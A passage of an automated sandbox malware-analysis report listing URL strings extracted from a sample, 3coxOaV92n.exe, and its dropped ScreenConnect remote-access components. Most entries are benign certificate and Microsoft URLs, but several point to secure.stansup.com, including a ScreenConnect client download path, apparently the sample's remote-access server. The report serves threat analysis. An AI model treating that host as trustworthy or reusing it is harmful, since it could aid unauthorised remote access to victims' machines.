                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000006.00000002.3287569710.00000246CF8B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285134135.000002487ACDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlP
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.7.dr, 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2921558850.000002A1740E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2d67091
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en6
                  Source: svchost.exe, 00000007.00000003.2203602585.000002487BCB2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166034498.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165600632.000002487B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165712864.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166852109.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2277886362.000002487BCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165629059.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186944592.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166897807.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167337468.000002487B50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdnc#
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
                  Source: svchost.exe, 00000007.00000003.2166034498.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165600632.000002487B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165712864.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166852109.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165629059.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186944592.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166897807.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167337468.000002487B50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2001
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xml
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdOAPF
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds/www
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2922992654.000002A175A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3286034426.000002487BCA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scR
                  Source: svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicy
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281238846.000002487BCFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285900941.000002487BC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustm
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3288065688.00000000019DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10053D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.co
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuer
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063568750.000002487B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000006.00000003.2055900652.00000246CF5B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000007.00000002.3286034426.000002487BCA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfH
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationft
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationh
